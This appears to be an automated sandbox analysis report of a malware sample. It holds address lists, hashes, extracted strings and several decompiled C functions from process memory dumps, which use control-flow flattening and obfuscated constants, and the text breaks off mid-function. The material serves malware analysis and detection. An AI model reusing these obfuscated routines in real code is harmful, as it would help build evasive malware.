0x00246a5f
0x00246a67
0x00246a6f
0x00246a77
0x00246a7f
0x00246a87
0x00246a8c
0x00246a94
0x00246a9c
0x00246aa4
0x00246aac
0x00246ab4
0x00246abc
0x00246ac4
0x00246acc
0x00246ad4
0x00246adc
0x00246ae4
0x00246aec
0x00246af1
0x00246af9
0x00246b01
0x00246b09
0x00246b11
0x00246b1a
0x00246b1d
0x00246b21
0x00246b29
0x00246b31
0x00246b39
0x00246b41
0x00246b49
0x00246b51
0x00246b59
0x00246b61
0x00246b69
0x00246b71
0x00246b79
0x00246b81
0x00246b8b
0x00246b90
0x00246b95
0x00246b9d
0x00246ba5
0x00246bad
0x00246bb5
0x00246bbd
0x00246bc5
0x00246bd2
0x00246bd6
0x00246bde
0x00246be6
0x00246bee
0x00246bf6
0x00246bfe
0x00246c06
0x00246c0e
0x00246c16
0x00246c1e
0x00246c1e
0x00246c1e
0x00246c23
0x00000000
0x00246c28
0x00246c28
0x00246c2e
0x00246d35
0x00246d36
0x00246d39
0x00246d3f
0x00246d43
0x00246d45
0x00246d4e
0x00246d53
0x00246d58
0x00246d5d
0x00000000
0x00246d5d
0x00246d47
0x00246d22
0x00246d22
0x00246cca
0x00246cca
0x00246ccf
0x00246ccf
0x00000000
0x00246ccf
0x00246c3a
0x00000000
0x00246d96
0x00246c42
0x00246d70
0x00246d73
0x00246d78
0x00246d7b
0x00000000
0x00246d7b
0x00246c4e
0x00246d17
0x00246d1d
0x00000000
0x00246d1d
0x00246c5a
0x00246cd9
0x00246ceb
0x00246cf0
0x00246cf3
0x00246cf6
0x00246cfd
0x00246d02
0x00246d07
0x00000000
0x00246d07
0x00246c5e
0x00246c93
0x00246cb0
0x00246cb5
0x00246cb8
0x00246cbb
0x00246cc2
0x00246cc7
0x00000000
0x00246cc7
0x00246c62
0x00000000
0x00000000
0x00246c77
0x00246c7c
0x00246c7f
0x00246c89
0x00246c8e
0x00000000
0x00246d62
0x00246d62
0x00246d62
0x00000000
0x00246c28
0x00246c28

Strings

'&/U, xrefs: 00246AB4
k<, xrefs: 00246A1E
y7X, xrefs: 00246B71
.V, xrefs: 00246AD4
?j, xrefs: 00246B39
"=, xrefs: 00246B79
GX, xrefs: 00246A67

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "=$'&/U$.V$?j$GX$y7X$k<
API String ID: 0-2482092835
Opcode ID: a7e5d1a2f3d287a44995c79708e55e1112216707bb59d5886862548a72b63c66
Instruction ID: 5f079f9dc98511229a2982a19e5f9ccc4842dd1e519dd6019df158affef14e39
Opcode Fuzzy Hash: a7e5d1a2f3d287a44995c79708e55e1112216707bb59d5886862548a72b63c66
Instruction Fuzzy Hash: E5A183B2928341AFD358CF25C58A40BFBE1FBD5714F508A1DF48AA6260D7B5C919CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00241280, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00241280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t124;
				void* _t136;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				void* _t149;
				void* _t170;
				void* _t172;
				void* _t173;

				_push(_a16);
				_t169 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t124);
				_v112 = 0x527a;
				_t173 = _t172 + 0x18;
				_v112 = _v112 + 0x9ab3;
				_t170 = 0;
				_t149 = 0x18640a1d;
				_t144 = 0x56;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0028d5a0;
				_v84 = 0xce56;
				_v84 = _v84 | 0x89224a79;
				_v84 = _v84 ^ 0x8922db02;
				_v124 = 0x8cd1;
				_v124 = _v124 ^ 0x879587c2;
				_v124 = _v124 | 0xdff4f7f6;
				_v124 = _v124 ^ 0xdff58592;
				_v80 = 0x5082;
				_v80 = _v80 * 5;
				_v80 = _v80 ^ 0x0001dd7a;
				_v100 = 0x94cc;
				_v100 = _v100 >> 1;
				_v100 = _v100 + 0xc5d3;
				_v100 = _v100 ^ 0x0001674a;
				_v104 = 0x7528;
				_v104 = _v104 | 0x4afc80c9;
				_v104 = _v104 * 0x41;
				_v104 = _v104 ^ 0x0a3a6635;
				_v108 = 0x5a30;
				_v108 = _v108 >> 6;
				_t145 = 0x51;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x00000b43;
				_v128 = 0x7a75;
				_v128 = _v128 ^ 0x183e3e2b;
				_v128 = _v128 >> 0xe;
				_v128 = _v128 << 1;
				_v128 = _v128 ^ 0x0000b567;
				_v88 = 0xd0b6;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0x0003606d;
				_v92 = 0x29e5;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0x29e559c0;
				_v116 = 0xa20c;
				_v116 = _v116 / _t145;
				_v116 = _v116 << 1;
				_v116 = _v116 ^ 0x00003b63;
				_v120 = 0xbe93;
				_v120 = _v120 | 0x1a4ed6db;
				_v120 = _v120 + 0xa009;
				_v120 = _v120 + 0xfffff07c;
				_v120 = _v120 ^ 0x1a4feb5f;
				_v96 = 0x4975;
				_t146 = 0x2b;
				_v96 = _v96 * 0x31;
				_v96 = _v96 / _t146;
				_v96 = _v96 ^ 0x000025f7;
				do {
					while(_t149 != 0x1a9c3b7) {
						if(_t149 == 0xb87d72f) {
							__eflags = E0024B055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
							_t170 =  !=  ? 1 : _t170;
						} else {
							if(_t149 == 0x18640a1d) {
								_t149 = 0x1a19e858;
								continue;
							} else {
								if(_t149 == 0x1a19e858) {
									E002550F2( &_v76, _v112, _v84, _v124, _a12);
									_t173 = _t173 + 0xc;
									_t149 = 0x1a9c3b7;
									continue;
								} else {
									if(_t149 != 0x2b3c78b1) {
										goto L13;
									} else {
										_t143 = E00258F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
										_t173 = _t173 + 0x10;
										if(_t143 != 0) {
											_t149 = 0xb87d72f;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t170;
					}
					_t136 = E00258F11( &_v76, _v80, _v100, _t169, _v104, _v108);
					_t173 = _t173 + 0x10;
					__eflags = _t136;
					if(__eflags == 0) {
						_t149 = 0x1a747795;
						goto L13;
					} else {
						_t149 = 0x2b3c78b1;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t149 - 0x1a747795;
				} while (__eflags != 0);
				goto L16;
			}

0x0024128a
0x00241291
0x00241298
0x0024129f
0x002412a0
0x002412a7
0x002412a8
0x002412a9
0x002412ae
0x002412b6
0x002412b9
0x002412c8
0x002412ca
0x002412d1
0x002412d4
0x002412d8
0x002412e0
0x002412e8
0x002412f0
0x002412f8
0x00241300
0x00241308
0x00241310
0x00241318
0x00241325
0x00241329
0x00241331
0x00241339
0x0024133d
0x00241345
0x0024134d
0x00241355
0x00241362
0x00241366
0x0024136e
0x00241376
0x00241381
0x00241382
0x00241388
0x00241390
0x00241398
0x002413a0
0x002413a5
0x002413a9
0x002413b1
0x002413b9
0x002413be
0x002413c6
0x002413ce
0x002413d3
0x002413db
0x002413eb
0x002413ef
0x002413f3
0x002413fb
0x00241403
0x0024140b
0x00241413
0x0024141b
0x00241423
0x00241432
0x00241433
0x00241447
0x0024144b
0x00241453
0x00241453
0x0024145d
0x0024152a
0x0024152c
0x00241463
0x00241469
0x002414cd
0x00000000
0x0024146b
0x0024146d
0x002414be
0x002414c3
0x002414c6
0x00000000
0x0024146f
0x00241475
0x00000000
0x0024147b
0x00241493
0x00241498
0x0024149d
0x002414a3
0x00000000
0x002414a3
0x0024149d
0x00241475
0x0024146d
0x00241469
0x00241530
0x0024153b
0x0024153b
0x002414e6
0x002414eb
0x002414ee
0x002414f0
0x002414fc
0x00000000
0x002414f2
0x002414f2
0x00000000
0x002414f2
0x00000000
0x00241501
0x00241501
0x00241501
0x00000000

Strings

zR, xrefs: 002412AE
5f:, xrefs: 00241366
uz, xrefs: 00241390
0Z, xrefs: 0024136E
c;, xrefs: 002413F3
uI, xrefs: 00241423

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0Z$5f:$c;$uI$uz$zR
API String ID: 0-4070947617
Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction ID: 92b09c59e0a263b70223d4198e6096a45d8195de7488b21e2ce8a0e6eaf4e403
Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
Instruction Fuzzy Hash: 45617571118341AFD758CF20C98591FBBE1FBC9748F80991DF196862A0D7B9CA588F43

Uniqueness

Uniqueness Score: -1.00%

Function 002417AC, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E002417AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* __ecx;
				void* _t124;
				intOrPtr _t144;
				void* _t148;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				signed int* _t175;

				_push(_a20);
				_push(1);
				_push(1);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0024602B(_t124);
				_v48 = 0x839b;
				_t175 =  &(( &_v52)[7]);
				_t172 = 0;
				_t148 = 0xc9f1fee;
				_t167 = 0x65;
				_v48 = _v48 / _t167;
				_v48 = _v48 + 0xffff5433;
				_t168 = 0x4c;
				_v48 = _v48 / _t168;
				_v48 = _v48 ^ 0x035e614e;
				_v52 = 0x7a24;
				_t169 = 0x57;
				_v52 = _v52 * 0x3d;
				_v52 = _v52 / _t169;
				_v52 = _v52 | 0x143fc393;
				_v52 = _v52 ^ 0x143ff5ea;
				_v32 = 0x6195;
				_v32 = _v32 ^ 0x160f1dee;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x2c1ed936;
				_v44 = 0xc7f4;
				_v44 = _v44 + 0xffff31e5;
				_v44 = _v44 | 0xcdfc86d8;
				_v44 = _v44 + 0xffff4cbe;
				_v44 = _v44 ^ 0xffff1878;
				_v12 = 0x3e0d;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x0003ab13;
				_v24 = 0xe2a2;
				_t170 = 0x4a;
				_v24 = _v24 * 0x7d;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0006fa2b;
				_v16 = 0xd6eb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x0000394e;
				_v40 = 0x5ece;
				_v40 = _v40 * 0x43;
				_v40 = _v40 / _t170;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x000003d1;
				_v28 = 0xdfec;
				_v28 = _v28 >> 6;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x001be0b4;
				_v20 = 0x73b;
				_v20 = _v20 ^ 0xd6615083;
				_v20 = _v20 ^ 0xd6610707;
				_v36 = 0x46b8;
				_v36 = _v36 | 0xf1966772;
				_v36 = _v36 ^ 0x374c3a36;
				_v36 = _v36 * 0x27;
				_v36 = _v36 ^ 0x4b440184;
				_v8 = 0xd697;
				_v8 = _v8 ^ 0x6f8084df;
				_v8 = _v8 ^ 0x6f807f26;
				_t171 = _v4;
				while(_t148 != 0x24e4c4b) {
					if(_t148 == 0xc9f1fee) {
						_t148 = 0x3ad8e818;
						continue;
					} else {
						if(_t148 == 0x1ffca7a2) {
							E00251AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
							_t175 =  &(_t175[0xa]);
							_t148 = 0x24e4c4b;
							_t172 =  !=  ? 1 : _t172;
							continue;
						} else {
							if(_t148 == 0x34494570) {
								if(E00250729(_v32,  &_v4, _v44, _t171) != 0) {
									_t148 = 0x1ffca7a2;
									continue;
								}
							} else {
								if(_t148 != 0x3ad8e818) {
									L13:
									if(_t148 != 0x2a0664e6) {
										continue;
									}
								} else {
									_t144 = E0024F6DF(_t148);
									_t171 = _t144;
									if(_t144 != 0xffffffff) {
										_t148 = 0x34494570;
										continue;
									}
								}
							}
						}
					}
					return _t172;
				}
				E00254F7D(_v36, _v8, _v4);
				_t148 = 0x2a0664e6;
				goto L13;
			}

0x002417b3
0x002417ba
0x002417bb
0x002417bc
0x002417c0
0x002417c4
0x002417c6
0x002417cb
0x002417d3
0x002417dc
0x002417de
0x002417e5
0x002417ea
0x002417f0
0x002417fc
0x00241801
0x00241807
0x0024180f
0x0024181c
0x0024181f
0x0024182b
0x0024182f
0x00241837
0x0024183f
0x00241847
0x0024184f
0x00241853
0x0024185b
0x00241863
0x0024186b
0x00241873
0x0024187b
0x00241883
0x0024188b
0x00241890
0x00241898
0x002418a5
0x002418a6
0x002418aa
0x002418af
0x002418b7
0x002418bf
0x002418c4
0x002418cc
0x002418d9
0x002418e3
0x002418e7
0x002418ec
0x002418f4
0x002418fc
0x00241901
0x00241906
0x0024190e
0x00241916
0x0024191e
0x00241926
0x00241933
0x0024193b
0x00241948
0x0024194c
0x00241954
0x0024195c
0x00241964
0x0024196c
0x00241970
0x00241982
0x00241a1a
0x00000000
0x00241988
0x0024198a
0x00241a03
0x00241a08
0x00241a0b
0x00241a12
0x00000000
0x0024198c
0x00241992
0x002419d5
0x002419d7
0x00000000
0x002419d7
0x00241994
0x0024199a
0x00241a3b
0x00241a41
0x00000000
0x00000000
0x002419a0
0x002419a8
0x002419ad
0x002419b2
0x002419b8
0x00000000
0x002419b8
0x002419b2
0x0024199a
0x00241992
0x0024198a
0x00241a50
0x00241a50
0x00241a30
0x00241a36
0x00000000

Strings

N9, xrefs: 002418C4
pEI4, xrefs: 0024198C
>, xrefs: 00241883
pEI4, xrefs: 002419B8
6:L7, xrefs: 0024193B
$z, xrefs: 0024180F

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: >$$z$6:L7$N9$pEI4$pEI4
API String ID: 0-302225334
Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction ID: 2a331e18fddc372368b7408baa0b1563203c2860b822611f8ff5dc1be6ba8f15
Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
Instruction Fuzzy Hash: 2D6154711183419FD358CE65D88581FBBE5BFC8358F404A1DF1A696260C3B5CAAACF87

Uniqueness

Uniqueness Score: -1.00%

Function 002520C5, Relevance: 7.6, Strings: 6, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002520C5() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				void* _t124;
				short* _t127;
				void* _t132;
				void* _t134;
				intOrPtr _t150;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t167;
				void* _t169;

				_t169 = (_t167 & 0xfffffff8) - 0x250;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t132 = 0x3ec8c14;
				_v536 = 0x37230;
				_v544 = 0xcdd0;
				_v544 = _v544 >> 7;
				_v544 = _v544 ^ 0x000074a7;
				_v572 = 0xb951;
				_v572 = _v572 + 0xffffa9df;
				_v572 = _v572 ^ 0x00005eca;
				_v584 = 0x3783;
				_v584 = _v584 >> 1;
				_t159 = 0x30;
				_v584 = _v584 / _t159;
				_v584 = _v584 ^ 0x00007df0;
				_v592 = 0x764f;
				_t160 = 0x29;
				_v592 = _v592 * 0x6c;
				_v592 = _v592 + 0xffff1483;
				_v592 = _v592 ^ 0x0030effe;
				_v580 = 0x26e4;
				_v580 = _v580 + 0xffffa17d;
				_v580 = _v580 >> 0xc;
				_v580 = _v580 ^ 0x000fb6a3;
				_v588 = 0x592d;
				_v588 = _v588 * 0x5e;
				_v588 = _v588 + 0xfffff058;
				_v588 = _v588 ^ 0x0020c0b6;
				_v576 = 0x67c6;
				_v576 = _v576 >> 4;
				_v576 = _v576 | 0x70f0481f;
				_v576 = _v576 ^ 0x70f020ed;
				_v568 = 0x5c9a;
				_v568 = _v568 ^ 0x6d262440;
				_v568 = _v568 ^ 0x6d2624e4;
				_v552 = 0x512d;
				_v552 = _v552 / _t160;
				_v552 = _v552 ^ 0x00002fd7;
				_v540 = 0x67a3;
				_v540 = _v540 + 0x741c;
				_v540 = _v540 ^ 0x0000c39d;
				_v560 = 0xac4b;
				_v560 = _v560 | 0x611015d1;
				_v560 = _v560 ^ 0x6110f087;
				_v548 = 0xff97;
				_v548 = _v548 >> 8;
				_v548 = _v548 ^ 0x000016db;
				_v556 = 0xce04;
				_t161 = 0x2b;
				_v556 = _v556 / _t161;
				_v556 = _v556 ^ 0x000048b5;
				_v564 = 0x85d6;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 ^ 0x00007642;
				do {
					while(_t132 != 0x3ec8c14) {
						if(_t132 == 0x4e3e716) {
							_push(_v572);
							_t124 = E0025889D(0x25c9b0, _v544, __eflags);
							_pop(_t134);
							_t150 =  *0x25ca2c; // 0x6d8300
							_t108 = _t150 + 0x230; // 0x670056
							E0024C680(_t108, _v592, _v580, _t134, _v588,  *0x25ca2c, _t124,  &_v524);
							_t169 = _t169 + 0x1c;
							_t127 = E00252025(_v576, _t124, _v568, _v552);
							_t132 = 0x36d909ae;
							continue;
						} else {
							if(_t132 == 0x2942dba3) {
								_t127 = E00252B16(_v548,  &_v524, E002584CC, _v564, 0,  &_v524);
							} else {
								if(_t132 != 0x36d909ae) {
									goto L8;
								} else {
									_t127 = E002428CE( &_v524, _v540, _v560);
									 *_t127 = 0;
									_t132 = 0x2942dba3;
									continue;
								}
							}
						}
						L11:
						return _t127;
					}
					_t132 = 0x4e3e716;
					L8:
					__eflags = _t132 - 0x16e8989b;
				} while (__eflags != 0);
				goto L11;
			}

0x002520cb
0x002520d1
0x002520d8
0x002520dd
0x002520e2
0x002520ea
0x002520f2
0x002520f7
0x002520ff
0x00252107
0x0025210f
0x00252117
0x0025211f
0x0025212d
0x00252132
0x00252138
0x00252145
0x0025215c
0x0025215f
0x00252163
0x0025216b
0x00252173
0x0025217b
0x00252183
0x00252188
0x00252190
0x0025219d
0x002521a1
0x002521a9
0x002521b1
0x002521b9
0x002521be
0x002521c6
0x002521ce
0x002521d6
0x002521de
0x002521e6
0x002521f6
0x002521fa
0x00252202
0x0025220a
0x00252212
0x0025221a
0x00252222
0x0025222a
0x00252232
0x0025223a
0x0025223f
0x00252247
0x00252253
0x00252256
0x0025225a
0x00252262
0x0025226a
0x0025226f
0x00252277
0x00252277
0x00252285
0x002522ae
0x002522bb
0x002522c0
0x002522dc
0x002522e6
0x002522ec
0x002522f1
0x00252302
0x00252309
0x00000000
0x00252287
0x00252289
0x00252339
0x0025228f
0x00252291
0x00000000
0x00252293
0x0025229f
0x002522a7
0x002522aa
0x00000000
0x002522aa
0x00252291
0x00252289
0x00252341
0x00252348
0x00252348
0x00252310
0x00252312
0x00252312
0x00252312
0x00000000

Strings

-Y, xrefs: 00252190
$&m, xrefs: 002521DE
Ov, xrefs: 00252145
&, xrefs: 00252173
-Q, xrefs: 002521E6
Bv, xrefs: 0025226F

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: -Q$-Y$Bv$Ov$$&m$&
API String ID: 0-2434786051
Opcode ID: bb484e3e95cd45a7f7fe57fd15d366127c8458890c395ea717b5776a3ba604e8
Instruction ID: ffd31084e32d42cddc5db7090a515e0c20be41014d69c45902d06e9bf6f91ec3
Opcode Fuzzy Hash: bb484e3e95cd45a7f7fe57fd15d366127c8458890c395ea717b5776a3ba604e8
Instruction Fuzzy Hash: 04517871118341AFD358CF21C88A91BBBF1FBC5328F509A1DF985862A0C7B58959CF86

Uniqueness

Uniqueness Score: -1.00%

Function 100021F0, Relevance: 7.6, APIs: 5, Instructions: 67encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
CoTaskMemAlloc.OLE32(?), ref: 10002227
CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
CoTaskMemFree.OLE32(00000000), ref: 1000227A

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: BinaryCryptStringTask$AllocDeserializeFreePropVariant
String ID:
API String ID: 2967290590-0
Opcode ID: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
Instruction ID: 3bbe9fb0322c03d3a19eaaaaa04faf6b757ff22615bcfcbc1accf4c01beb8128
Opcode Fuzzy Hash: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
Instruction Fuzzy Hash: 51116D3AA01129BBEB10DBD48C44FDE77FCDB457A1F010266FE05E2154DA719A408AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00246754, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00246754(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				unsigned int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				void* _t96;
				signed int _t97;
				signed int _t101;
				intOrPtr _t104;
				signed int _t106;
				signed int _t107;
				void* _t108;
				signed int _t123;
				void* _t124;
				intOrPtr* _t128;
				signed int* _t129;

				_t129 =  &_v572;
				_v524 = _v524 & 0x00000000;
				_v532 = 0x37527f;
				_v528 = 0x4295e6;
				_v536 = 0xee22;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x00007a3a;
				_v544 = 0x8f72;
				_v544 = _v544 | 0xa1a2610a;
				_v544 = _v544 ^ 0xa1a2ad19;
				_v540 = 0xc65b;
				_v540 = _v540 << 9;
				_v540 = _v540 ^ 0x018ca8d5;
				_v572 = 0x4354;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff6940;
				_v572 = _v572 * 0x52;
				_t128 = __edx;
				_v572 = _v572 ^ 0xb1ecefd2;
				_v552 = 0x7a0c;
				_t104 = __ecx;
				_v552 = _v552 | 0xfffddbf7;
				_t124 = 0x1663684c;
				_v552 = _v552 ^ 0xfffd8a47;
				_v568 = 0x9348;
				_t106 = 0xf;
				_v568 = _v568 * 0x32;
				_v568 = _v568 + 0x92e3;
				_v568 = _v568 * 0x69;
				_v568 = _v568 ^ 0x0c08d7a0;
				_v556 = 0x9f50;
				_v556 = _v556 / _t106;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0x000022d0;
				_v548 = 0xa3e1;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x000031bd;
				_v564 = 0x55b6;
				_v564 = _v564 >> 1;
				_v564 = _v564 + 0xaf4f;
				_t107 = 0x5e;
				_t123 = _v548;
				_v564 = _v564 / _t107;
				_v564 = _v564 ^ 0x0000417a;
				_v560 = 0xe775;
				_v560 = _v560 << 4;
				_v560 = _v560 << 0xd;
				_v560 = _v560 ^ 0xceea6264;
				do {
					while(_t124 != 0x32e36bf) {
						if(_t124 == 0xcc4ee6e) {
							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
							_t97 =  *0x25ca24; // 0x0
							 *(_t123 + 0x2c) = _t97;
							 *0x25ca24 = _t123;
							return _t97;
						}
						if(_t124 != 0x1663684c) {
							if(_t124 == 0x2308bbf2) {
								return E0024F536(_v548, _v564, _v560, _t123);
							}
							if(_t124 != 0x242d3c72) {
								goto L12;
							} else {
								_push( &_v520);
								_t101 = E002488E5(_t104, _t128);
								asm("sbb esi, esi");
								_t107 = 0x25c910;
								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
								continue;
							}
							L16:
							return _t101;
						}
						_push(_t107);
						_t108 = 0x38;
						_t101 = E00248736(_t108);
						_t123 = _t101;
						_t107 = _t107;
						if(_t123 != 0) {
							_t124 = 0x242d3c72;
							continue;
						}
						goto L16;
					}
					_push(_t107);
					_push(_v556);
					_push( &_v520);
					_push(_v568);
					_push(0);
					_push(_v552);
					_t107 = _v572;
					_push(0);
					_t96 = E0024568E(_t107, 0);
					_t129 =  &(_t129[7]);
					if(_t96 == 0) {
						_t124 = 0x2308bbf2;
						goto L12;
					} else {
						_t124 = 0xcc4ee6e;
						continue;
					}
					goto L16;
					L12:
				} while (_t124 != 0x2bbec955);
				return _t101;
			}

0x00246754
0x0024675a
0x0024675f
0x00246767
0x0024676f
0x00246777
0x0024677c
0x00246784
0x0024678c
0x00246794
0x0024679c
0x002467a4
0x002467a9
0x002467b1
0x002467b8
0x002467bc
0x002467cb
0x002467cf
0x002467d1
0x002467db
0x002467e3
0x002467e5
0x002467ed
0x002467f2
0x002467fa
0x00246809
0x0024680c
0x00246810
0x0024681d
0x00246821
0x00246829
0x00246839
0x0024683d
0x00246842
0x0024684a
0x00246852
0x00246857
0x0024685f
0x00246867
0x0024686b
0x00246877
0x0024687a
0x0024687e
0x00246882
0x0024688a
0x00246892
0x00246897
0x0024689c
0x002468a4
0x002468a4
0x002468b2
0x00246984
0x00246987
0x0024698c
0x0024698f
0x00000000
0x0024698f
0x002468be
0x002468c6
0x00000000
0x00246981
0x002468d2
0x00000000
0x002468d8
0x002468de
0x002468e6
0x002468f0
0x002468f8
0x002468f9
0x00000000
0x002468f9
0x0024699f
0x0024699f
0x0024699f
0x0024690d
0x00246911
0x00246912
0x00246917
0x0024691a
0x0024691d
0x0024691f
0x00000000
0x0024691f
0x00000000
0x0024691d
0x00246929
0x0024692a
0x00246934
0x00246935
0x00246939
0x0024693b
0x0024693f
0x00246943
0x00246945
0x0024694a
0x0024694f
0x0024695b
0x00000000
0x00246951
0x00246951
0x00000000
0x00246951
0x00000000
0x00246960
0x00246960
0x00000000

Strings

zA, xrefs: 00246882
r<-$, xrefs: 002468CC
:z, xrefs: 0024677C
u, xrefs: 0024688A
r<-$, xrefs: 0024691F

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: :z$r<-$$r<-$$u$zA
API String ID: 0-4189644680
Opcode ID: dc0507888cd3e1314e9ef00e9d71de6921b7849abb6c5a0a85bb9d0657e5548d
Instruction ID: 4a52d10b3d7033ae235d6f8bf41a0f2732ac50070cb4a10210c22b37a7368f43
Opcode Fuzzy Hash: dc0507888cd3e1314e9ef00e9d71de6921b7849abb6c5a0a85bb9d0657e5548d
Instruction Fuzzy Hash: B05188715183029FD318CF26C94961FBBE0EBC9758F104A1DF4D8A62A0D7B48A19CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0024839D, Relevance: 6.4, Strings: 5, Instructions: 140
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0024839D(void* __ecx, void* __edi) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				int _t181;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t194;
				void* _t211;
				void* _t215;
				signed int _t217;

				_v28 = 0x5ca2;
